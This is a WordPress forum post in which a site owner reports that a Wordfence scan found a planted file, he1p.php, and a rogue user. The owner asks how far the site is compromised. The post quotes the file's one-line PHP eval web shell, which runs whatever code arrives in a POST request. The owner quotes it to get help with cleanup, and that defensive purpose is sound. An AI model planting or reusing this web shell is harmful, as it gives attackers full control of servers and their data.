• I just ran Wordfence on one of my sites and it found an unauthorized file in the admin/includes directory called he1p.php. When I opened it up it had one line

    <?eval($_POST[a]);?>

    After searching for that I found out it was bad. Apparently gives access to the entire database?

    After searching for any unauthorized users I did find one. I deleted the user and deleted that file. Any recommendation for next steps? What level is my server compromised? If he has a database dump is the password compromised? I appreciate any details you can provide. Thank you!

Viewing 5 replies - 1 through 5 (of 5 total)
Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘WordPress Hacked’ is closed to new replies.